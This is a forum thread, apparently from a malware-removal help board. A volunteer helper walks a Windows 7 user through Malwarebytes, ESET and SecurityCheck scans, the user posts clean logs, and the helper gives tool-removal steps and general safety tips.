Please download Malwarebytes Anti-Malware to your desktop
Install the progamme and select update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits

MBAMsettings_zpsb6b9ada0.jpg

Go back to the Dashboard and select Scan Now

MBAMScan_zps8ba7d192.jpg

If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.

MBAMReboot_zps9089ab30.jpg

MBAMLog_zpsade07f42.jpg

On completion of the scan (or after the reboot), start MBAM,

Click History, then Application Logs, then check the Select box by the first Scan Log in the list.

Click View, then click Export, select text file and save to the desktop as MBAM.txt and post in your next reply.



Step 2: Scan with ESET Online Scanner


Please note: You can use Internet Explorer or Firefox for this step. Either browser used will have to be ran in admin mode.

Right click on either the Internet Explorer icon or the Firefox icon in the Start Menu or Quick Launch Bar on the Task bar and select Run as Administrator from the menu.

If you use Firefox, you will be prompted to download esetsmartinstaller_enu.exe. Please do so, then double click it to install it.

Please click on this link and then click the ESET Online Scanner bar ---->esetbar_zps93905f48.jpg
  • Select the option YES, I accept the Terms of Use then click on Start
  • When prompted allow the Add-On/Active X to install.
  • Make sure that the option Remove found threats is NOT checked.
  • Make sure that the option Scan archives is checked.
  • Now click on Advanced Settings and select the following:
  • Scan for potentially unwanted applications
  • Scan for potentially unsafe applications
  • Enable Anti-Stealth Technology
  • Now click on Start
  • The virus signature database will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
  • When completed the Online Scan will begin automatically. The scan may take several hours.
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • Now click on Finish
  • Use notepad to open the logfile located at C:\Program Files(x86)\ESET\EsetOnlineScanner\log.txt.
  • Copy and paste that log as a reply to this topic.
Step 3: SecurityCheck Scan


Download Security Checksecuritycheck_zpsb7736812.jpg by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
Things I need to see in your next post:
  • ESET Scan Log
  • MBAM Log
  • SecurityCheck Log

  • 0

Advertisements


#11
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

The ESET on-line scanner did not find any problems.  There was no *.txt file in the ESET folder.


  • 0

#12
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

The MBAM log is posted below.

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 11/6/2014
Scan Time: 9:10:01 PM
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.00.3.1025
Malware Database: v2014.11.07.01
Rootkit Database: v2014.11.01.02
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Joe
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 309377
Time Elapsed: 3 min, 56 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)

  • 0

#13
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

The Securitychek Log is posted below.

 

 Results of screen317's Security Check version 0.99.89  
 Windows 7 Service Pack 1 x64 (UAC is enabled)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
AVG AntiVirus Free Edition 2015   
 Antivirus out of date!  
`````````Anti-malware/Other Utilities Check:````````` 
 Spybot - Search & Destroy 
 Adobe Reader XI  
 Google Chrome 38.0.2125.104  
 Google Chrome 38.0.2125.111  
````````Process Check: objlist.exe by Laurent````````  
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbam.exe  
 Spybot Teatimer.exe is disabled! 
 AVG avgwdsvc.exe 
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C: 24% Defragment your hard drive soon! (Do NOT defrag if SSD!)
````````````````````End of Log`````````````````````` 

  • 0

#14
glasgow3219

glasgow3219

    Member

  • Topic Starter
  • Member
  • PipPip
  • 13 posts

Pystryker, the unusual processes that were previously active in the taskmanager window are no longer active.  The computer is operating as expected now.  Much thanks for getting me this far!!  I have posted the requested information above and await any further instructions.


  • 0

#15
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,912 posts

Pystryker, the unusual processes that were previously active in the taskmanager window are no longer active. The computer is operating as expected now. Much thanks for getting me this far!! I have posted the requested information above and await any further instructions.


Outstanding, just what I wanted to hear! :thumbsup:


Great news, your logs are CLEAN! :thumbsup: :) but we still have a few things we need to address namely:
  • I need to remove the tools we installed on your machine.
  • I have some tips and information to help reduce the chances of infection.
Ok, here we go:


Step 1: Tool Removal with Delfix and Creation of a clean restore point
  • Download Delfix from here
  • Ensure Remove disinfection tools is ticked
    Also tick:
    • Create registry backup
    • Purge system restore
    delfix.jpg
  • Click Run
The program will run for a few moments and then notepad will open with a log. Please paste the log in your next reply.

You can uninstall ESET Online Scanner at this time.

I recommend keeping Malwarebytes Anti-Malware installed. Make sure to update it and run it at least once a week. If it finds things such as PUP's (Potentially Unwanted Programs) you can delete those with no worries. However, if it finds something like a trojan, come see us.


Step 2: Anti-Virus Update, Installation of FileHIppo, and Hard Disk Defragmentation


Your anti-virus is in need of updating. This is a vital defense in keeping your system malware free. You can perform updates using the Check for Updates option within the menu that opens after right mouse button clicking over the AVG icon located on the system tray.

Hard Disk Drive Defragmentation

Your hard disk drive is currently at 24% fragmented. Please click the link below for instructions on how to defrag your drive.

http://windows.micro...C=windows-vista

Note: Defragmentation can take quite a while.

Keeping your software updated

Another weapon against malicious programs and viruses is to keeping other programs updated. There are several programs out there that can check for out of date programs on your computer. One is Filehippo. You can run this on a weekly or monthly basis to check your programs for updates and then it will provide a link for you to download them.

Download Filehippo Updatechecker


Step 3: Tips, Information and Optional Installation of Unchecky


Watch what you open in your emails. If you get an email from an unknown source with any attached files, do not open it.

Install and keep only one anti-virus on your machine. Update it and scan your machine with it at least once a week.

Be careful of the websites you visit.

When installing new programs, don't be "click happy" and click through the screens. Many programs come with adware in them and are set to install them by default. Several programs require that you uncheck or select no to prevent the installation. Take you time and read each screen as you go. :)

To help protect yourself while on the web, I recommend you read How did I get infected in the first place?

Installation of Unchecky

This is a very good little program that will automatically uncheck any boxes during a software installation. This helps prevent the software from installing any malware that is by default checked while the program is being installed.

Click here to be taken to Unchecky.com

Click the very large Download button.

Click Save

Once downloaded, double click the program (Vista, Win 7, and 8, right click and Run as Administrator)

Once open, click the Install button.


unchecky1_zps667e512d.jpg


Then click Finish

unchecky2_zpsca4e7d0d.jpg


Unchecky is now installed and will help you keep unwanted check boxes unchecked. :thumbsup:

Things I need to see in your next post:

Delfix Log

  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP